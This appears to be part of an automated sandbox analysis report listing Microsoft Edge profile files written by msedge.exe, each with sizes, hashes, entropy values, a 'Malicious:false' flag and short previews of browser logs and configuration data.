                                                                                                                                                                Preview:SQLite format 3......@ ..........................................................................j...%.................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000001.dbtmp

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):16
                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\000003.log

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):375520
                                                                                                                                                                Entropy (8bit):5.354126940671263
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6144:dA/imBpx6WdPSxKWcHu5MURacq49QxxPnyEndBuHltBfdK5WNbsVEziP/CfXtLPz:dFdMyq49tEndBuHltBfdK5WNbsVEziPU
                                                                                                                                                                MD5:AC83B77A1415847FA874341CF1D7A264
                                                                                                                                                                SHA1:EB3AE0722BD7B2F2927A694D53388686B8B703AA
                                                                                                                                                                SHA-256:B882469B8F9FB4189CE2BD5AA56C9E2F27091EA14A4327D78B19C1BD945973BD
                                                                                                                                                                SHA-512:8DE3D3AAF54CB026DDA6C3F7F9824D7018FBF336F79546953919C7684567377DB09FD8C080F19CDEEA8A70A8623921CF5D2A7D6B28E76DF9FB80C3225B6A1BC8
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:...m.................DB_VERSION.1..".q...............&QUERY_TIMESTAMP:domains_config_gz2.*.*.13380903755639689..QUERY:domains_config_gz2.*.*..[{"name":"domains_config_gz","url":"https://edgeassetservice.azureedge.net/assets/domains_config_gz/2.8.76/asset?assetgroup=EntityExtractionDomainsConfig","version":{"major":2,"minor":8,"patch":76},"hash":"78Xsq/1H+MXv88uuTT1Rx79Nu2ryKVXh2J6ZzLZd38w=","size":374872}]..*.`~...............ASSET_VERSION:domains_config_gz.2.8.76..ASSET:domains_config_gz...{"config": {"token_limit": 1600, "page_cutoff": 4320, "default_locale_map": {"bg": "bg-bg", "bs": "bs-ba", "el": "el-gr", "en": "en-us", "es": "es-mx", "et": "et-ee", "cs": "cs-cz", "da": "da-dk", "de": "de-de", "fa": "fa-ir", "fi": "fi-fi", "fr": "fr-fr", "he": "he-il", "hr": "hr-hr", "hu": "hu-hu", "id": "id-id", "is": "is-is", "it": "it-it", "ja": "ja-jp", "ko": "ko-kr", "lv": "lv-lv", "lt": "lt-lt", "mk": "mk-mk", "nl": "nl-nl", "nb": "nb-no", "no": "no-no", "pl": "pl-pl", "pt": "pt-pt", "ro": "

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\CURRENT (copy)

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):16
                                                                                                                                                                Entropy (8bit):3.2743974703476995
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:1sjgWIV//Uv:1qIFUv
                                                                                                                                                                MD5:46295CAC801E5D4857D09837238A6394
                                                                                                                                                                SHA1:44E0FA1B517DBF802B18FAF0785EEEA6AC51594B
                                                                                                                                                                SHA-256:0F1BAD70C7BD1E0A69562853EC529355462FCD0423263A3D39D6D0D70B780443
                                                                                                                                                                SHA-512:8969402593F927350E2CEB4B5BC2A277F3754697C1961E3D6237DA322257FBAB42909E1A742E22223447F3A4805F8D8EF525432A7C3515A549E984D3EFF72B23
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:MANIFEST-000001.

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\LOG

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):315
                                                                                                                                                                Entropy (8bit):5.18682367848329
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:iOrvR3V81cNwi23oH+Tcwtk2WwnvB2KLl5vRKWT+q2PcNwi23oH+Tcwtk2WwnvIg:7JVGZYebkxwnvFLvT+vLZYebkxwnQFUv
                                                                                                                                                                MD5:CDF559A5A9E57D9DD276EF9EE07C15FB
                                                                                                                                                                SHA1:F14E663C6401A26E08BE165B87F2BEF5B9077647
                                                                                                                                                                SHA-256:7D8458AA1C9AFDE6E3E4344F6EDC69F30F693BF742F0C3BDCB88060D95725B06
                                                                                                                                                                SHA-512:BE3C7C7138D70FAA684934FBB0E6CAE30F577C2692AE9DB903E2DBF960E0D1ECD935335FCE4A15C6B56A87000ED73F59E7DF4DB7C230625EF0B197341A931CE7
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:2025/01/09-08:42:34.141 94c Creating DB C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db since it was missing..2025/01/09-08:42:34.641 94c Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtractionAssetStore.db/MANIFEST-000001.

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\EntityExtractionAssetStore.db\MANIFEST-000001

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:OpenPGP Secret Key
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):41
                                                                                                                                                                Entropy (8bit):4.704993772857998
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:scoBAIxQRDKIVjn:scoBY7jn
                                                                                                                                                                MD5:5AF87DFD673BA2115E2FCF5CFDB727AB
                                                                                                                                                                SHA1:D5B5BBF396DC291274584EF71F444F420B6056F1
                                                                                                                                                                SHA-256:F9D31B278E215EB0D0E9CD709EDFA037E828F36214AB7906F612160FEAD4B2B4
                                                                                                                                                                SHA-512:DE34583A7DBAFE4DD0DC0601E8F6906B9BC6A00C56C9323561204F77ABBC0DC9007C480FFE4092FF2F194D54616CAF50AECBD4A1E9583CAE0C76AD6DD7C2375B
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:.|.."....leveldb.BytewiseComparator......

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\EntityExtraction\domains_config.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:modified
                                                                                                                                                                Size (bytes):358860
                                                                                                                                                                Entropy (8bit):5.3246096299140815
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6144:CgimBVvUrsc6rRA81b/18jyJNjfvrfM6RY:C1gAg1zfvA
                                                                                                                                                                MD5:FBCFCCFEBBF6C36E01A29D109E743A2D
                                                                                                                                                                SHA1:68E64AD91482303E4710B838AFD4BC383441676E
                                                                                                                                                                SHA-256:34A205B115F5D803966AB0F2D797AE9E1FC794A9BC771F20B168D60B24F87061
                                                                                                                                                                SHA-512:F0AFDDA2B8DD1BA703C02E113D1E71BC13F3098ACC18C04899BE669D70B9DEFCB90A8D276F992DD0332CE76A1E5A69DADD6EECBCA3AE09C2287DFD9C47FD1AD2
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"aee_config":{"ar":{"price_regex":{"ae":"(((ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(ae|aed|\\x{062F}\\x{0660}\\x{0625}\\x{0660}|\\x{062F}\\.\\x{0625}|dhs|dh)))","dz":"(((dzd|da|\\x{062F}\\x{062C})\\s*\\d{1,3})|(\\d{1,3}\\s*(dzd|da|\\x{062F}\\x{062C})))","eg":"(((e\\x{00a3}|egp)\\s*\\d{1,3})|(\\d{1,3}\\s*(e\\x{00a3}|egp)))","ma":"(((mad|dhs|dh)\\s*\\d{1,3})|(\\d{1,3}\\s*(mad|dhs|dh)))","sa":"((\\d{1,3}\\s*(sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633}))|((sar\\s*\\x{fdfc}|sar|sr|\\x{fdfc}|\\.\\x{0631}\\.\\x{0633})\\s*\\d{1,3}))"},"product_terms":"((\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{0639}\\x{0631}\\x{0628}\\x{0629})|(\\x{0623}\\x{0636}\\x{0641}\\s*\\x{0625}\\x{0644}\\x{0649}\\s*\\x{0627}\\x{0644}\\x{062D}\\x{0642}\\x{064A}\\x{0628}\\x{0629})|(\\x{0627}\\x{0634}\\x{062A}\\x{0631}\\x{064A}\\s*\\x{0627}\\x{0644}\\x{0622}\\x{0646})|(\\x{062E}\\x{064A}\\x{0627}\\x{0631}

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\000003.log

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):418
                                                                                                                                                                Entropy (8bit):1.8784775129881184
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):330
                                                                                                                                                                Entropy (8bit):5.182624272590532
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:iOrvRg+lNAVq2PcNwi23oH+Tcwt8aPrqIFUtJvRgSAgZmwPvRgSAIkwOcNwi23oD:7WqOvLZYebL3FUtgs/qM54ZYebQJ
                                                                                                                                                                MD5:651B276236C93614740E7BBDC953C68A
                                                                                                                                                                SHA1:74AAD571816B61E85838A21E50C2D40D1368359A
                                                                                                                                                                SHA-256:5E3D53A2372775DBA2F043DED2B166B7B7B56FEEB0DE62ED62D9FF7A35810618
                                                                                                                                                                SHA-512:1EA89E46727A1BCEFE513BADA648F6E8D349D819916D5793C4CFBD9B55086DBA893A0759F1D508DF2B4D633D3EC093B8C8D67B9108D78C7BCFADD1EB6876E036
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:2025/01/09-08:42:28.162 1dd0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2025/01/09-08:42:28.164 1dd0 Recovering log #3.2025/01/09-08:42:28.164 1dd0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules\LOG.old (copy)

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):330
                                                                                                                                                                Entropy (8bit):5.182624272590532
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:iOrvRg+lNAVq2PcNwi23oH+Tcwt8aPrqIFUtJvRgSAgZmwPvRgSAIkwOcNwi23oD:7WqOvLZYebL3FUtgs/qM54ZYebQJ
                                                                                                                                                                MD5:651B276236C93614740E7BBDC953C68A
                                                                                                                                                                SHA1:74AAD571816B61E85838A21E50C2D40D1368359A
                                                                                                                                                                SHA-256:5E3D53A2372775DBA2F043DED2B166B7B7B56FEEB0DE62ED62D9FF7A35810618
                                                                                                                                                                SHA-512:1EA89E46727A1BCEFE513BADA648F6E8D349D819916D5793C4CFBD9B55086DBA893A0759F1D508DF2B4D633D3EC093B8C8D67B9108D78C7BCFADD1EB6876E036
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:2025/01/09-08:42:28.162 1dd0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/MANIFEST-000001.2025/01/09-08:42:28.164 1dd0 Recovering log #3.2025/01/09-08:42:28.164 1dd0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Rules/000003.log .

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\000003.log

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):418
                                                                                                                                                                Entropy (8bit):1.8784775129881184
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:qTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCTCT:qWWWWWWWWWWWWWWWWWWWWW
                                                                                                                                                                MD5:BF097D724FDF1FCA9CF3532E86B54696
                                                                                                                                                                SHA1:4039A5DD607F9FB14018185F707944FE7BA25EF7
                                                                                                                                                                SHA-256:1B8B50A996172C16E93AC48BCB94A3592BEED51D3EF03F87585A1A5E6EC37F6B
                                                                                                                                                                SHA-512:31857C157E5B02BCA225B189843CE912A792A7098CEA580B387977B29E90A33C476DF99AD9F45AD5EB8DA1EFFD8AC3A78870988F60A32D05FA2DA8F47794FACE
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5...............

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):334
                                                                                                                                                                Entropy (8bit):5.207762769342074
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:iOrvR3vAVq2PcNwi23oH+Tcwt865IFUtJvRFF0NAgZmwPvRFAIkwOcNwi23oH+TT:7KvLZYeb/WFUt4/L54ZYeb/+SJ
                                                                                                                                                                MD5:81CB774D67126009136599D3CB6653E1
                                                                                                                                                                SHA1:D76C70E44830AF2DB8C55DC25F6BDB6E22A03FE9
                                                                                                                                                                SHA-256:C5617F214DE2FF4D501964DB2B8AEA375EA7FC49326FF1C38C94D8F2C93F79F4
                                                                                                                                                                SHA-512:54643732DABA48B40A8B7ECA159BE4031ACDB41F1FD29C1F2B06B30B11275F71859783C454FF5A1728A219B294C3DD90191F8752117FBD28CF159255DBA4B8C9
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:2025/01/09-08:42:28.175 1dd0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2025/01/09-08:42:28.176 1dd0 Recovering log #3.2025/01/09-08:42:28.177 1dd0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts\LOG.old (copy)

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):334
                                                                                                                                                                Entropy (8bit):5.207762769342074
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:iOrvR3vAVq2PcNwi23oH+Tcwt865IFUtJvRFF0NAgZmwPvRFAIkwOcNwi23oH+TT:7KvLZYeb/WFUt4/L54ZYeb/+SJ
                                                                                                                                                                MD5:81CB774D67126009136599D3CB6653E1
                                                                                                                                                                SHA1:D76C70E44830AF2DB8C55DC25F6BDB6E22A03FE9
                                                                                                                                                                SHA-256:C5617F214DE2FF4D501964DB2B8AEA375EA7FC49326FF1C38C94D8F2C93F79F4
                                                                                                                                                                SHA-512:54643732DABA48B40A8B7ECA159BE4031ACDB41F1FD29C1F2B06B30B11275F71859783C454FF5A1728A219B294C3DD90191F8752117FBD28CF159255DBA4B8C9
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:2025/01/09-08:42:28.175 1dd0 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/MANIFEST-000001.2025/01/09-08:42:28.176 1dd0 Recovering log #3.2025/01/09-08:42:28.177 1dd0 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension Scripts/000003.log .

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\000003.log

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):1254
                                                                                                                                                                Entropy (8bit):1.8784775129881184
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:12:qWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWWA:
                                                                                                                                                                MD5:826B4C0003ABB7604485322423C5212A
                                                                                                                                                                SHA1:6B8EF07391CD0301C58BB06E8DEDCA502D59BCB4
                                                                                                                                                                SHA-256:C56783C3A6F28D9F7043D2FB31B8A956369F25E6CE6441EB7C03480334341A63
                                                                                                                                                                SHA-512:0474165157921EA84062102743EE5A6AFE500F1F87DE2E87DBFE36C32CFE2636A0AE43D8946342740A843D5C2502EA4932623C609B930FE8511FE7356D4BAA9C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:.f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5................f.5........

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):327
                                                                                                                                                                Entropy (8bit):5.162867780125177
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:iOrvREgs+Vq2PcNwi23oH+Tcwt8NIFUtJvREgsgZmwPvREgsIkwOcNwi23oH+TcN:7mF6vLZYebpFUtEq/SW54ZYebqJ
                                                                                                                                                                MD5:E9D09C8D55CB4A6B6AE21BC74D753BB8
                                                                                                                                                                SHA1:CCC79599AA50F020A90F6562CCE443CF90E6D400
                                                                                                                                                                SHA-256:81CB2D092CDE6E24E68EFA9D66E09676577AA7CA8F4AC061DBF681E6B4C9D2DD
                                                                                                                                                                SHA-512:2024C369AAF192BA29832D8AC0E940CBC5C0EACABBFEE2756814CEC12ECA9077AAFE73DF8600DD812292AC9C8B90ABEE023E2F8AB9E346DD27552C0DCFC052CB
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:2025/01/09-08:42:29.121 680 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2025/01/09-08:42:29.122 680 Recovering log #3.2025/01/09-08:42:29.122 680 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State\LOG.old (copy)

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):327
                                                                                                                                                                Entropy (8bit):5.162867780125177
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:iOrvREgs+Vq2PcNwi23oH+Tcwt8NIFUtJvREgsgZmwPvREgsIkwOcNwi23oH+TcN:7mF6vLZYebpFUtEq/SW54ZYebqJ
                                                                                                                                                                MD5:E9D09C8D55CB4A6B6AE21BC74D753BB8
                                                                                                                                                                SHA1:CCC79599AA50F020A90F6562CCE443CF90E6D400
                                                                                                                                                                SHA-256:81CB2D092CDE6E24E68EFA9D66E09676577AA7CA8F4AC061DBF681E6B4C9D2DD
                                                                                                                                                                SHA-512:2024C369AAF192BA29832D8AC0E940CBC5C0EACABBFEE2756814CEC12ECA9077AAFE73DF8600DD812292AC9C8B90ABEE023E2F8AB9E346DD27552C0DCFC052CB
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:2025/01/09-08:42:29.121 680 Reusing MANIFEST C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/MANIFEST-000001.2025/01/09-08:42:29.122 680 Recovering log #3.2025/01/09-08:42:29.122 680 Reusing old log C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extension State/000003.log .

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\Extensions\jmjflgjpcpepeafmmgdpfkogkghcpiha\1.2.1_0\_metadata\computed_hashes.json

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:JSON data
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):429
                                                                                                                                                                Entropy (8bit):5.809210454117189
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:6:Y8U0vEjrAWT0VAUD9lpMXO4SrqiweVHUSENjrAWT0HQQ9/LZyVMQ3xqiweVHlrSQ:Y8U5j0pqCjJA7tNj0pHx/LZ4hcdQ
                                                                                                                                                                MD5:5D1D9020CCEFD76CA661902E0C229087
                                                                                                                                                                SHA1:DCF2AA4A1C626EC7FFD9ABD284D29B269D78FCB6
                                                                                                                                                                SHA-256:B829B0DF7E3F2391BFBA70090EB4CE2BA6A978CCD665EEBF1073849BDD4B8FB9
                                                                                                                                                                SHA-512:5F6E72720E64A7AC19F191F0179992745D5136D41DCDC13C5C3C2E35A71EB227570BD47C7B376658EF670B75929ABEEBD8EF470D1E24B595A11D320EC1479E3C
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{"file_hashes":[{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","6RbL+qKART8FehO4s7U0u67iEI8/jaN+8Kg3kII+uy4=","CuN6+RcZAysZCfrzCZ8KdWDkQqyaIstSrcmsZ/c2MVs="],"block_size":4096,"path":"content.js"},{"block_hashes":["OdZL4YFLwCTKbdslekC6/+U9KTtDUk+T+nnpVOeRzUc=","UL53sQ5hOhAmII/Yx6muXikzahxM+k5gEmVOh7xJ3Rw=","u6MdmVNzBUfDzMwv2LEJ6pXR8k0nnvpYRwOL8aApwP8="],"block_size":4096,"path":"content_new.js"}],"version":2}

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\History-journal

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:data
                                                                                                                                                                Category:modified
                                                                                                                                                                Size (bytes):8720
                                                                                                                                                                Entropy (8bit):0.2191763562065486
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:3:BtjtFlljq7A/mhWJFuQ3yy7IOWUf24t4dweytllrE9SFcTp4AGbNCV9RUIh4:BC75fO12hd0Xi99pEY74
                                                                                                                                                                MD5:BBB7FE55D4B6CF87EF7BAE25669C469C
                                                                                                                                                                SHA1:953A06FA1067C46A9AEDE6E2B7E1B5386333AB0E
                                                                                                                                                                SHA-256:7ED4CAFE84197EA3CC507B585843046D530A92535224AD9065F01C5095DBC9B8
                                                                                                                                                                SHA-512:96177423200FC7B6267EBDBDF493219BC4E3A510824993E9FB2F8AE542B05F5655855B147C98DD3F5F46A4895573F166399498EE667B967EEBA33A0A1777E01D
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:............:......&....................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................................

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps (copy)

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:ASCII text, with very long lines (1597), with CRLF line terminators
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):115717
                                                                                                                                                                Entropy (8bit):5.183660917461099
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:1536:utDURN77GZqW3v6PD/469IxVBmB22q7LRks3swn0:utAaE2Jt0
                                                                                                                                                                MD5:3D8183370B5E2A9D11D43EBEF474B305
                                                                                                                                                                SHA1:155AB0A46E019E834FA556F3D818399BFF02162B
                                                                                                                                                                SHA-256:6A30BADAD93601FC8987B8239D8907BCBE65E8F1993E4D045D91A77338A2A5B4
                                                                                                                                                                SHA-512:B7AD04F10CD5DE147BDBBE2D642B18E9ECB2D39851BE1286FDC65FF83985EA30278C95263C98999B6D94683AE1DB86436877C30A40992ACA1743097A2526FE81
                                                                                                                                                                Malicious:false
                                                                                                                                                                Preview:{.. "current_locale": "en-GB",.. "hub_apps": [ {.. "auto_show": {.. "enabled": true,.. "fre_notification": {.. "enabled": true,.. "header": "Was opening this pane helpful to you?",.. "show_count": 2,.. "text": "Was opening this pane helpful to you?".. },.. "settings_description": "We'll automatically open Bing Chat in the sidebar to show you relevant web experiences alongside your web content",.. "settings_title": "Automatically open Bing Chat in the sidebar",.. "triggering_configs|flight:msHubAppsMsnArticleAutoShowTriggering": [ {.. "show_count_basis": "signal",.. "signal_name": "IsMsnArticleAutoOpenFromP1P2",.. "signal_threshold": 0.5.. } ],.. "triggering_configs|flight:msUndersidePersistentChat": [ {.. "signal_name": "IsUndersidePersistentChatLink",.. "signal_threshold": 0.5.. } ],.. "triggering_co

                                                                                                                                                                C:\Users\user\AppData\Local\Microsoft\Edge\User Data\Default\HubApps Icons

                                                                                                                                                                Download File
                                                                                                                                                                Process:C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                                                                                                File Type:SQLite 3.x database, last written using SQLite version 3042000, file counter 7, database pages 12, cookie 0x3, schema 4, UTF-8, version-valid-for 7
                                                                                                                                                                Category:dropped
                                                                                                                                                                Size (bytes):49152
                                                                                                                                                                Entropy (8bit):3.6481013572779455
                                                                                                                                                                Encrypted:false
                                                                                                                                                                SSDEEP:384:aj9P0WcAjlUP/KbtZ773pLwgam6IYhfQkQerIRKToaAu:adYKlUP/w7xoJe2IRKcC
                                                                                                                                                                MD5:D81C8BE11AD38618AE9661104064DD28
                                                                                                                                                                SHA1:D0CFBB1A58CC1C831076E87B7E1853F67FE1800F
                                                                                                                                                                SHA-256:8C72A234D67C28E269D5434FB9F10AA4E4794BBE63B97169F268ECCE8A1998EA
